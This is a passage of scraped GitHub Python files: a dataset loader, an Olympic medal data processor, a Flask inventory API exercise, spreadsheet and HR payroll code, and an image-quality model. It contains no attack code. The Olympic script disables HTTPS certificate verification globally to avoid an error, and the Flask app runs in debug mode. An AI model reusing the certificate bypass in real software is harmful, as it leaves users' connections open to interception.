path.exists():\n self._download(path)\n self.rawdata = np.load(file_name)\n self.path = path\n self.images = list(map(transform, self.rawdata[\"imgs\"]))\n self.latent_values = self.rawdata[\"latents_values\"]\n self.latent_classes = self.rawdata[\"latents_classes\"]\n\n def __getitem__(self, i) -> Tuple[Any, Tuple[ndarray, ndarray]]:\n return self.images[i], (self.latent_values[i], self.latent_classes[i])\n\n def __len__(self) -> int:\n return len(self.images)\n\n def __repr__(self) -> str:\n return \"Dsprites dataset in{}\".format(self.path)\n\n def _download(self, path: Path) -> None:\n req = request.Request(self.URL)\n print(\"Downloading dsprites_ndarray_*.npz...\")\n with request.urlopen(req) as res:\n path.write_bytes(res.read())\n","repo_name":"kngwyu/pytorch-autoencoders","sub_path":"pytorch_autoencoders/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"44468180974","text":"from numpy import dtype, inf\r\nimport pandas as pd\r\nimport ssl\r\nssl._create_default_https_context = ssl._create_unverified_context # Tää korjaa sen SSL: CERTIFICATE_VERIFY_FAILED jos yrittää lukea dataa URL:stä\r\npd.set_option(\"display.precision\", 2)\r\n\r\ndf = pd.read_csv('https://query.data.world/s/cvvxnd5qafkvb64qq7jw44o6y2zcpr') # Data olympialaisista 1896-2018\r\nTokio2020Data = pd.read_csv('Tokio2020.csv', encoding='latin-1') # Data vuoden 2020 olympialaisista (Lukee täl hetkel tuolta tiedostosta)\r\nHostData = pd.read_csv('HostCities.csv', encoding='latin-1') # Data olympia isäntä valtioista\r\nCodeData = pd.read_csv('https://raw.githubusercontent.com/datasets/country-codes/master/data/country-codes.csv') # Täältä haetaan ne ISO3166-1 koodit kartaa varten\r\nRecordsM = pd.read_csv('RecordsMen.csv', encoding='latin-1') # Data nykyisistä miesten olympiaennätyksistä\r\nRecordsW = pd.read_csv('RecordsWomen.csv', encoding='latin-1') # Data nykyisistä naisten olympiaennätyksistä\r\nFlags = pd.read_csv('Flags.csv', encoding='latin-1')\r\nMedalsBySport = pd.read_csv('MedalsBySport.csv', encoding='latin-1')\r\n\r\n# Annetaan jokaiselle valtiolle ISO3166-1 koodi d3-karttaa varten\r\ndf.set_index('Code', inplace = True)\r\nHostData.set_index('Code', inplace = True)\r\nCodeData.set_index('IOC', inplace = True)\r\nRecordsM.set_index('NOC', inplace = True)\r\nRecordsW.set_index('NOC', inplace = True)\r\nMedalsBySport.set_index('NOC', inplace = True)\r\nFlags.set_index('NOC', inplace = True)\r\nFlags = Flags[~Flags.index.duplicated()]\r\nCodeData = CodeData[~CodeData.index.duplicated()]\r\ndf['id'] = CodeData['ISO3166-1-Alpha-3']\r\n\r\n# Koska Venäjä oli ROC eikä RUS vuonna 2020\r\nTokio2020Data.loc[Tokio2020Data['Team/NOC']=='ROC', 'NOCCode'] = 'RUS' \r\nTokio2020Data.set_index('NOCCode', inplace = True)\r\n\r\n# Vähän uudelleen nimetään asioita\r\ndf.rename(columns = {'Medal.1':'Medals (Total)', 'Apps':'Appearances (Total)', \r\n 'SO_Apps':'Appearances (Summer)', 'WO_Apps':'Appearances (Winter)',\r\n 'SO_Medal':'Medals (Summer)', 'WO_Medal':'Medals (Winter)',\r\n '':''}, inplace = True)\r\n\r\ndf.loc[df['Nation']=='Germany, East', 'Nation'] = 'East Germany'\r\ndf.loc[df['Nation']=='Germany, West', 'Nation'] = 'West Germany'\r\ndf.loc[df['Nation']=='Germany, United Team of', 'Nation'] = 'United Team of Germany'\r\ndf.loc[df['Nation']=='China, Republic of', 'Nation'] = 'Republic of China'\r\ndf.loc[df['Nation']=='Micronesia, Federated States of', 'Nation'] = 'Federated States of Micronesia'\r\ndf.loc[df['Nation']=='Yemen, North', 'Nation'] = 'North Yemen'\r\ndf.loc[df['Nation']=='Yemen, South', 'Nation'] = 'South Yemen'\r\n\r\n# Lisätään 2020 vuoden mitalit muiden vuosien kokonaismitalimäärään\r\n# Ne ketkä ei osallistunut 2020 olympialaisiin saa arvoksi NaN, tää vaihtaa ne nollaksi (0)\r\ndf['Tokio'] = Tokio2020Data['Total']\r\ndf['Tokio'] = df['Tokio'].fillna(0)\r\ndf['Medals (Total)'] += df['Tokio']\r\ndf['Medals (Summer)'] += df['Tokio'] \r\n\r\ndf['Tokio'] = Tokio2020Data['Gold'] \r\ndf['Tokio'] = df['Tokio'].fillna(0) \r\ndf['Gold'] += df['Tokio'] \r\ndf['SO_Gold'] += df['Tokio'] \r\n\r\ndf['Tokio'] = Tokio2020Data['Silver'] \r\ndf['Tokio'] = df['Tokio'].fillna(0) \r\ndf['Silver'] += df['Tokio'] \r\ndf['SO_Silver'] += df['Tokio'] \r\n\r\ndf['Tokio'] = Tokio2020Data['Bronze'] \r\ndf['Tokio'] = df['Tokio'].fillna(0) \r\ndf['Bronze'] += df['Tokio'] \r\ndf['SO_Bronze'] += df['Tokio'] \r\n \r\n# Lisätään isännöinti infot\r\ndf['Hosts (Total)'] = HostData['HostTotal']\r\ndf['Hosts (Total)'] = df['Hosts (Total)'].fillna(0)\r\ndf['Hosts (Summer)'] = HostData['HostSummer']\r\ndf['Hosts (Summer)'] = df['Hosts (Summer)'].fillna(0)\r\ndf['Hosts (Winter)'] = HostData['HostWinter']\r\ndf['Hosts (Winter)'] = df['Hosts (Winter)'].fillna(0)\r\ndf['HostInfo'] = HostData['Info']\r\n\r\n# Ennätykset\r\ndf['RecordsM'] = RecordsM['Record']\r\ndf['RecordsW'] = RecordsW['Record']\r\n\r\n# Liput\r\ndf['Flag'] = Flags['Flag']\r\n\r\n# Mitalimäärä väkilukuun nähden\r\ndf.loc[df['Medals (Total)'] > 0, 'Medals (Per capita)'] = df['Medals (Total)'] / df['Population'] * 1000000 \r\ndf['Medals (Per capita)'] = df['Medals (Per capita)'].fillna(0) # Tää on niille kenel ei ollu yhtää mitalia, muuten ne saa inf\r\ndf.loc[df['Medals (Per capita)'] == inf, 'Medals (Per capita)'] = 0\r\n\r\n# Vähän tyyppien muuttelua\r\ndf = df.astype({'Medals (Total)': int, 'Gold': int, 'Silver': int, 'Bronze': int, # Tehdään näistä kokonaislukuja ettei tuu desimaaleja\r\n 'Medals (Summer)': int, 'SO_Gold': int, 'SO_Silver': int, 'SO_Bronze': int,\r\n 'Hosts (Total)': int, 'Hosts (Summer)': int, 'Hosts (Winter)': int})\r\n\r\n# Poistetaan turhia sarakkeita\r\ndf = df.drop(df.columns[[22, 23, 24, 25, 26, 33]], axis=1)\r\n\r\nlajit = MedalsBySport.columns.values.tolist()\r\n\r\nfor laji in lajit:\r\n df[laji] = MedalsBySport[laji]\r\n df[laji] = df[laji].fillna(0)\r\n df[laji] = df[laji].astype(int)\r\n\r\nkoodittomat = {\r\n \"Bohemia\": \"XBO\",\r\n \"British West Indies\": \"XBI\",\r\n \"Republic of China\": \"XRC\",\r\n \"Czechoslovakia\": \"XCS\",\r\n \"East Germany\": \"XEG\",\r\n \"United Team of Germany\": \"XUG\",\r\n \"West Germany\": \"XWG\",\r\n \"Independent Olympic Participants\": \"XIP\",\r\n \"Korea\": \"XKR\",\r\n \"Kosovo\": \"XKO\",\r\n \"Malaya\": \"XML\",\r\n \"Marshall Islands\": \"XMI\",\r\n \"Montenegro\": \"MNE\",\r\n \"North Borneo\": \"XNB\",\r\n \"Russian Empire\": \"XRE\",\r\n \"Saar\": \"XSA\",\r\n \"Serbia and Montenegro\": \"XSM\",\r\n \"Singapore\": \"SGP\",\r\n \"Soviet Union\": \"XSU\",\r\n \"Sudan, South\": \"SSD\",\r\n \"Unified Team\": \"XUT\",\r\n \"North Yemen\": \"XNY\",\r\n \"South Yemen\": \"XSY\",\r\n \"Yugoslavia\": \"XYS\"\r\n}\r\nfor ryhma_avain in koodittomat:\r\n df.loc[df['Nation']==ryhma_avain, 'id'] = koodittomat[ryhma_avain]\r\n \r\ndf['iidee'] = df['id']\r\n\r\ndf.set_index('iidee', inplace = True)\r\n\r\n# Tehdään dataframesta csv-tiedosto\r\ndf.to_csv('datacsv.csv', index=False, float_format='%.2f')\r\ndf.to_json('tietorakenne.json', orient='index')","repo_name":"OlliMehtonen/Olympiaprojekti","sub_path":"Debug/Data/CSVLukija.py","file_name":"CSVLukija.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23074866523","text":"import json\nimport click\nfrom jsonschema import validate, ValidationError\nfrom flask import Flask, Response, request, url_for\nfrom flask.cli import with_appcontext\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_restful import Resource, Api\nfrom sqlalchemy.exc import IntegrityError, StatementError\nfrom werkzeug.exceptions import NotFound\nfrom werkzeug.routing import BaseConverter\n\napp = Flask(__name__)\napp.config[\"SERVER_NAME\"] = \"127.0.0.1:8000\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///test.db\"\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\ndb = SQLAlchemy(app)\n\napi = Api(app)\n\nMASON = \"application/vnd.mason+json\"\nERROR_PROFILE = \"/profiles/error/\"\nLINK_RELATIONS_URL = \"/storage/link-relations/\"\nPRODUCT_PROFILE = \"/profiles/product/\"\n\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n handle = db.Column(db.String(64), unique=True, nullable=False)\n price = db.Column(db.Float, nullable=False)\n weight = db.Column(db.Float, nullable=False)\n\n storage = db.relationship(\"StorageItem\", back_populates=\"product\")\n\n @staticmethod\n def json_schema():\n schema = {\n \"type\": \"object\",\n \"properties\": {},\n \"required\": [\"handle\", \"price\", \"weight\"]\n }\n props = schema[\"properties\"]\n props[\"handle\"] = {\n \"description\": \"Products unique handle\",\n \"type\": \"string\"\n }\n props[\"price\"] = {\n \"description\": \"Products price\",\n \"type\": \"number\"\n }\n props[\"weight\"] = {\n \"description\": \"Products weight\",\n \"type\": \"number\"\n }\n return schema\n\n\nclass StorageItem(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n qty = db.Column(db.Integer, nullable=False)\n product_id = db.Column(db.Integer, db.ForeignKey(\n \"product.id\"), nullable=False)\n location = db.Column(db.String(64), nullable=False)\n\n product = db.relationship(\"Product\", back_populates=\"storage\")\n\n\nclass ProductConverter(BaseConverter):\n\n def to_python(self, product_name):\n db_product = Product.query.filter_by(handle=product_name).first()\n if db_product is None:\n raise NotFound\n return db_product\n\n def to_url(self, db_product):\n return db_product.handle\n\n\nclass MasonBuilder(dict):\n \"\"\"\n A convenience class for managing dictionaries that represent Mason\n objects. It provides nice shorthands for inserting some of the more\n elements into the object but mostly is just a parent for the much more\n useful subclass defined next. This class is generic in the sense that it\n does not contain any application specific implementation details.\n\n Note that child classes should set the *DELETE_RELATION* to the application\n specific relation name from the application namespace. The IANA standard\n does not define a link relation for deleting something.\n \"\"\"\n\n DELETE_RELATION = \"\"\n\n def add_control(self, ctrl_name, href, **kwargs):\n \"\"\"\n Adds a control property to an object. Also adds the @controls property\n if it doesn't exist on the object yet. Technically only certain\n properties are allowed for kwargs but again we're being lazy and don't\n perform any checking.\n The allowed properties can be found from here\n https://github.com/JornWildt/Mason/blob/master/Documentation/Mason-draft-2.md\n : param str ctrl_name: name of the control (including namespace if any)\n : param str href: target URI for the control\n \"\"\"\n\n if \"@controls\" not in self:\n self[\"@controls\"] = {}\n\n self[\"@controls\"][ctrl_name] = kwargs\n self[\"@controls\"][ctrl_name][\"href\"] = href\n\n def add_control_post(self, ctrl_name, title, href, schema):\n \"\"\"\n Utility method for adding POST type controls. The control is\n constructed from the method's parameters. Method and encoding are\n fixed to \"POST\" and \"json\" respectively.\n\n : param str ctrl_name: name of the control (including namespace if any)\n : param str href: target URI for the control\n : param str title: human-readable title for the control\n : param dict schema: a dictionary representing a valid JSON schema\n \"\"\"\n\n self.add_control(\n ctrl_name,\n href,\n method=\"POST\",\n encoding=\"json\",\n title=title,\n schema=schema\n )\n\n def add_control_put(self, title, href, schema):\n \"\"\"\n Utility method for adding PUT type controls. The control is\n constructed from the method's parameters. Control name, method and\n encoding are fixed to \"edit\", \"PUT\" and \"json\" respectively.\n\n : param str href: target URI for the control\n : param str title: human-readable title for the control\n : param dict schema: a dictionary representing a valid JSON schema\n \"\"\"\n\n self.add_control(\n \"edit\",\n href,\n method=\"PUT\",\n encoding=\"json\",\n title=title,\n schema=schema\n )\n\n def add_control_delete(self, title, href):\n \"\"\"\n Utility method for adding PUT type controls. The control is\n constructed from the method's parameters. Control method is fixed to\n \"DELETE\", and control's name is read from the class attribute\n *DELETE_RELATION* which needs to be overridden by the child class.\n\n : param str href: target URI for the control\n : param str title: human-readable title for the control\n \"\"\"\n\n self.add_control(\n \"mumeta:delete\",\n href,\n method=\"DELETE\",\n title=title,\n )\n\n def add_namespace(self, ns, uri):\n \"\"\"\n Adds a namespace element to the object. A namespace defines where our\n link relations are coming from. The URI can be an address where\n developers can find information about our link relations.\n : param str ns: the namespace prefix\n : param str uri: the identifier URI of the namespace\n \"\"\"\n\n if \"@namespaces\" not in self:\n self[\"@namespaces\"] = {}\n\n self[\"@namespaces\"][ns] = {\n \"name\": uri\n }\n\n\nclass InventoryBuilder(MasonBuilder):\n\n def add_control_all_products(self):\n self.add_control(\n \"storage:products-all\",\n api.url_for(ProductCollection),\n title=\"All products\",\n method=\"GET\"\n )\n\n def add_control_delete_product(self, handle):\n self.add_control(\n \"storage:delete\",\n api.url_for(ProductItem, product=handle),\n method=\"DELETE\"\n )\n\n def add_control_add_product(self):\n self.add_control_post(\n \"storage:add-product\",\n \"Add a new product\",\n api.url_for(ProductCollection),\n Product.json_schema()\n )\n\n def add_control_edit_product(self, handle):\n self.add_control_put(\n \"edit\",\n api.url_for(ProductItem, product=handle),\n Product.json_schema(),\n )\n\n\n@click.command(\"init-db\")\n@with_appcontext\ndef init_db_command():\n \"\"\"\n Initializes the database. If already initialized, nothing happens.\n \"\"\"\n\n db.create_all()\n\n\n@click.command(\"populate-db\")\n@with_appcontext\ndef populate_db_command():\n \"\"\"\n Populates the database with products\n \"\"\"\n\n for i in range(1, 4):\n p = Product(\n handle=\"test-product-{}\".format(i),\n price=10.5 * i,\n weight=2.1 * i\n )\n db.session.add(p)\n db.session.commit()\n\n\n@app.route(\"/api/\")\ndef api_entry_point():\n body = InventoryBuilder()\n body.add_namespace(\"storage\", LINK_RELATIONS_URL)\n body.add_control_all_products()\n return Response(json.dumps(body), 200, mimetype=MASON)\n\n\n@app.route(\"/\")\ndef index():\n return \"How to1:\"\n\n\n@app.route(\"/products/link-relations/\")\ndef link_relations():\n return \"here be link relations\"\n\n\n@app.route(\"/profiles/product/\")\ndef profiles():\n return \"How to3:\"\n\n\n@app.route(\"/profiles/error-profile/\")\ndef profiles_error():\n return \"error-profile\"\n\n\nclass ProductCollection(Resource):\n\n def get(self):\n\n body = InventoryBuilder(items=[])\n body.add_namespace(\"storage\", LINK_RELATIONS_URL)\n body.add_control(\"self\", href=api.url_for(ProductCollection))\n body.add_control_add_product()\n\n for product in Product.query.all():\n item = {\n \"handle\": product.handle,\n \"weight\": product.weight,\n \"price\": product.price,\n\n }\n item[\"@controls\"] = {\n \"self\": {\"href\": api.url_for(ProductItem, product=product)},\n \"profile\": {\"href\": PRODUCT_PROFILE}\n }\n body[\"items\"].append(item)\n return Response(json.dumps(body), 200, mimetype=MASON)\n\n def post(self):\n try:\n data = request.json\n handle = data[\"handle\"]\n weight = float(data[\"weight\"])\n price = float(data[\"price\"])\n product = Product(\n handle=handle,\n weight=weight,\n price=price\n )\n db.session.add(product)\n db.session.commit()\n except KeyError:\n return \"Incomplete request - missing fields\", 400\n except TypeError:\n return \"Request content type must be JSON\", 415\n except ValueError:\n return \"Weight and price must be numbers\", 400\n except IntegrityError:\n return \"Handle already exists\", 409\n except StatementError:\n return \"\", 500\n return Response(status=201, headers={\"Location\": api.url_for(ProductItem, product=product)})\n\n\nclass ProductItem(Resource):\n\n def get(self, product):\n product_information = {\n \"handle\": product.handle,\n \"weight\": product.weight,\n \"price\": product.price\n }\n body = InventoryBuilder(product_information)\n body.add_namespace(\"storage\", LINK_RELATIONS_URL)\n body.add_control(\"self\", href=api.url_for(\n ProductItem, product=product))\n body.add_control(\"profile\", href=PRODUCT_PROFILE)\n body.add_control(\"collection\", href=api.url_for(ProductCollection))\n body.add_control_edit_product(product)\n body.add_control_delete_product(product)\n return Response(json.dumps(body), 200, mimetype=MASON)\n\n def put(self, product):\n if not request.json:\n return \"Unsupported media type - Requests must be JSON\", 415\n\n try:\n validate(request.json, Product.json_schema())\n except ValidationError as e:\n return f\"Invalid JSON document: {e}\", 400\n\n product.handle = request.json[\"handle\"]\n product.price = float(request.json[\"price\"])\n product.weight = float(request.json[\"weight\"])\n\n try:\n db.session.commit()\n except IntegrityError:\n return f\"Product with handle '{product.handle}' already exists.\", 409\n\n return Response(status=204)\n\n def delete(self, product):\n db.session.delete(product)\n db.session.commit()\n\n return Response(status=204)\n\n\n@click.command(\"test-document\")\n@with_appcontext\ndef test_document_command():\n with app.app_context():\n product = Product.query.first()\n document = InventoryBuilder()\n document.add_control_all_products()\n document.add_control_add_product()\n document.add_control_delete_product(product)\n document.add_control_edit_product(product)\n document[\"@controls\"][\"collection\"]\n # print(document[\"items\"][0][\"@controls\"][\"self\"])\n\n\napp.url_map.converters[\"product\"] = ProductConverter\napi.add_resource(ProductCollection, \"/api/products/\")\napi.add_resource(ProductItem, \"/api/products//\")\napp.cli.add_command(init_db_command)\napp.cli.add_command(populate_db_command)\napp.cli.add_command(test_document_command)\n\nprint(\"Starting SensorHub flask app...\\n\\n\")\napp.run(debug=True)\n","repo_name":"lsuutari19/pwp-exercises","sub_path":"exc3/inventory/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12353648252","text":"from updategoogle import getdatafromgooglesheet\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\nspreadsheet_url = '1ejYQsDucZN1mDbwGNE1YW2oUE1S9xsbwiUsGr3zXsCk'\r\nsheet = 'SO'\r\n\r\na = getdatafromgooglesheet(spreadsheets_url=spreadsheet_url, sheet=sheet, range='C1:I')\r\nso = pd.DataFrame(data=a.iloc[1:,:].values,columns=a.iloc[0,:])\r\nso.columns = ['customer','so','mnf','po','item','qty','confirm_etd']\r\nso['row_number'] = so['po'].index+2\r\nso= so[~so['po'].isna()]\r\nso['qty'] = so['qty'].apply(lambda x: int(x.replace(',','')))\r\n \r\nso['confirm_etd'] = so['confirm_etd'].apply(lambda x: datetime.strptime(x,'%m/%d/%Y'))\r\n# print(so['confirm_etd'])\r\nif __name__ == '__main__':\r\n print(so['row_number'])\r\n print(so.dtypes)\r\n import os\r\n so.to_excel('so.xlsx')\r\n os.system('so.xlsx')","repo_name":"phananfn/pl","sub_path":"getdatafromSO.py","file_name":"getdatafromSO.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9502683907","text":"from http import HTTPStatus\n\nfrom flask import request\nfrom flask_cors import cross_origin\nfrom flask_restx import Namespace, Resource\nfrom marshmallow import ValidationError\n\nfrom met_api.auth import auth\nfrom met_api.auth import jwt as _jwt\nfrom met_api.schemas.engagement_metadata import EngagementMetadataSchema\nfrom met_api.services.engagement_metadata_service import EngagementMetadataService\nfrom met_api.utils.token_info import TokenInfo\nfrom met_api.utils.util import allowedorigins, cors_preflight\n\n\nAPI = Namespace('engagementsmetadata', description='Endpoints for Engagement Metadata Management')\n\"\"\"Custom exception messages\n\"\"\"\n\n\n@cors_preflight('GET,OPTIONS')\n@API.route('/')\nclass EngagementMetadata(Resource):\n \"\"\"Resource for managing a single engagement.\"\"\"\n\n @staticmethod\n @cross_origin(origins=allowedorigins())\n @auth.optional\n def get(engagement_id):\n \"\"\"Fetch a single engagement metadata matching the provided id.\"\"\"\n try:\n metadata_record = EngagementMetadataService().get_metadata(engagement_id)\n return metadata_record, HTTPStatus.OK\n except KeyError:\n return 'Engagement metadata was not found', HTTPStatus.INTERNAL_SERVER_ERROR\n except ValueError as err:\n return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n\n\n@cors_preflight('POST, PATCH, OPTIONS')\n@API.route('/')\nclass EngagementsMetadata(Resource):\n \"\"\"Resource for managing engagements metadata.\"\"\"\n\n @staticmethod\n @cross_origin(origins=allowedorigins())\n @_jwt.requires_auth\n def post():\n \"\"\"Create a new engagement metadata.\"\"\"\n try:\n requestjson = request.get_json()\n metadata_schema = EngagementMetadataSchema()\n metadata_model = EngagementMetadataService().create_metadata(requestjson)\n return metadata_schema.dump(metadata_model), HTTPStatus.OK\n except KeyError as err:\n return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n except ValueError as err:\n return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n except ValidationError as err:\n return str(err.messages), HTTPStatus.INTERNAL_SERVER_ERROR\n\n @staticmethod\n @cross_origin(origins=allowedorigins())\n @_jwt.requires_auth\n def patch():\n \"\"\"Update saved engagement metadata partially.\"\"\"\n try:\n requestjson = request.get_json()\n user_id = TokenInfo.get_id()\n requestjson['updated_by'] = user_id\n\n metadata_schema = EngagementMetadataSchema()\n metadata_schema.load(requestjson, partial=True)\n metadata = EngagementMetadataService().update_metadata(requestjson)\n\n return metadata_schema.dump(metadata), HTTPStatus.OK\n except KeyError as err:\n return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n except ValueError as err:\n return str(err), HTTPStatus.INTERNAL_SERVER_ERROR\n except ValidationError as err:\n return str(err.messages), HTTPStatus.INTERNAL_SERVER_ERROR\n","repo_name":"bcgov/met-public","sub_path":"met-api/src/met_api/resources/engagement_metadata.py","file_name":"engagement_metadata.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"15036742890","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, _\n\n\nclass HrPayslipInherit(models.Model):\n _inherit = 'hr.payslip'\n\n def _get_default_kpi_lines(self):\n kpis = self.env['employee.kpi'].search([])\n lines = []\n if kpis:\n for kpi in kpis:\n lines.append((0, 0, {\n 'employee_kpi_id': kpi.id,\n 'apply': False,\n }))\n if lines:\n return lines\n return False\n\n\n kpi_line_ids = fields.Many2many('employee.kpi.line', string=\"KPI's\", compute='_get_kpi_lines')\n\n @api.depends('date_from', 'date_to', 'employee_id')\n def _get_kpi_lines(self):\n for rec in self:\n lines = []\n for kh in self.env['employee.kpi.history'].search([('state', '=', 'confirmed'), ('date', '>=', rec.date_from), ('date', '<=', rec.date_to)], limit=1):\n for line in kh.kpi_line_ids:\n if line.apply:\n lines.append(line.id)\n rec.kpi_line_ids = [(6, 0, lines)]\n\n\n @api.model\n def _get_payslip_lines(self, contract_ids, payslip_id):\n res = super(HrPayslipInherit, self)._get_payslip_lines(contract_ids, payslip_id)\n\n rule_ids = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for line in payslip.kpi_line_ids:\n if line.apply:\n rule_ids.append(line.employee_kpi_id.salary_rule_id.id)\n\n def _sum_salary_rule_category(localdict, category, amount):\n if category.parent_id:\n localdict = _sum_salary_rule_category(localdict, category.parent_id, amount)\n localdict['categories'].dict[category.code] = category.code in localdict['categories'].dict and localdict['categories'].dict[category.code] + amount or amount\n return localdict\n\n class BrowsableObject(object):\n def __init__(self, employee_id, dict, env):\n self.employee_id = employee_id\n self.dict = dict\n self.env = env\n\n def __getattr__(self, attr):\n return attr in self.dict and self.dict.__getitem__(attr) or 0.0\n\n class InputLine(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(amount) as sum\n FROM hr_payslip as hp, hr_payslip_input as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()[0] or 0.0\n\n class WorkedDays(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n def _sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"\n SELECT sum(number_of_days) as number_of_days, sum(number_of_hours) as number_of_hours\n FROM hr_payslip as hp, hr_payslip_worked_days as pi\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pi.payslip_id AND pi.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n return self.env.cr.fetchone()\n\n def sum(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[0] or 0.0\n\n def sum_hours(self, code, from_date, to_date=None):\n res = self._sum(code, from_date, to_date)\n return res and res[1] or 0.0\n\n class Payslips(BrowsableObject):\n \"\"\"a class that will be used into the python code, mainly for usability purposes\"\"\"\n\n def sum(self, code, from_date, to_date=None):\n if to_date is None:\n to_date = fields.Date.today()\n self.env.cr.execute(\"\"\"SELECT sum(case when hp.credit_note = False then (pl.total) else (-pl.total) end)\n FROM hr_payslip as hp, hr_payslip_line as pl\n WHERE hp.employee_id = %s AND hp.state = 'done'\n AND hp.date_from >= %s AND hp.date_to <= %s AND hp.id = pl.slip_id AND pl.code = %s\"\"\",\n (self.employee_id, from_date, to_date, code))\n res = self.env.cr.fetchone()\n return res and res[0] or 0.0\n\n #we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules_dict = {}\n worked_days_dict = {}\n inputs_dict = {}\n blacklist = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days_dict[worked_days_line.code] = worked_days_line\n for input_line in payslip.input_line_ids:\n inputs_dict[input_line.code] = input_line\n\n categories = BrowsableObject(payslip.employee_id.id, {}, self.env)\n inputs = InputLine(payslip.employee_id.id, inputs_dict, self.env)\n worked_days = WorkedDays(payslip.employee_id.id, worked_days_dict, self.env)\n payslips = Payslips(payslip.employee_id.id, payslip, self.env)\n rules = BrowsableObject(payslip.employee_id.id, rules_dict, self.env)\n\n baselocaldict = {'categories': categories, 'rules': rules, 'payslip': payslips, 'worked_days': worked_days, 'inputs': inputs}\n contracts = self.env['hr.contract'].browse(contract_ids)\n sorted_rules = self.env['hr.salary.rule'].browse(rule_ids)\n for contract in contracts:\n employee = contract.employee_id\n localdict = dict(baselocaldict, employee=employee, contract=contract)\n for rule in sorted_rules:\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n localdict['result_rate'] = 100\n #check if the rule can be applied\n if rule._satisfy_condition(localdict) and rule.id not in blacklist:\n #compute the amount of the rule\n amount, qty, rate = rule._compute_rule(localdict)\n #check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n #set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n localdict[rule.code] = tot_rule\n rules_dict[rule.code] = rule\n #sum the amount for its salary category\n localdict = _sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n #create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n }\n else:\n #blacklist this rule and its children\n blacklist += [id for id, seq in rule._recursive_search_of_rules()]\n\n for item in list(result_dict.values()):\n res.append(item)\n return res","repo_name":"alkhatim905/Tools","sub_path":"alkhatim776/dareed15-master/employee_kpi/models/hr_payslip_inherit.py","file_name":"hr_payslip_inherit.py","file_ext":"py","file_size_in_byte":9008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17347291626","text":"import torch.nn as nn\nfrom torchvision import models\nimport torch\nimport torch.nn.functional as F\nfrom SCNN import SCNN\n\n\nclass DBCNN(nn.Module):\n\n def __init__(self, config):\n \"\"\"Declare all needed layers.\"\"\"\n nn.Module.__init__(self)\n # Convolution and pooling layers of VGG-16.\n self.features1 = models.vgg16(pretrained=True).features\n self.features1 = nn.Sequential(*list(self.features1.children())[:-1])\n\n scnn = SCNN()\n scnn = torch.nn.DataParallel(scnn).cuda()\n\n scnn.load_state_dict(torch.load(config.scnn_root))\n self.features2 = scnn.module.features\n\n # Linear classifier.\n\n if config.std_modeling:\n outdim = 2\n else:\n outdim = 1\n\n self.fc = nn.Linear(512 * 128, outdim)\n\n if config.fc:\n # Freeze all previous layers.\n for param in self.features1.parameters():\n param.requires_grad = False\n for param in self.features2.parameters():\n param.requires_grad = False\n # Initialize the fc layers.\n nn.init.kaiming_normal_(self.fc.weight.data)\n if self.fc.bias is not None:\n nn.init.constant_(self.fc.bias.data, val=0)\n\n def forward(self, X):\n \"\"\"Forward pass of the 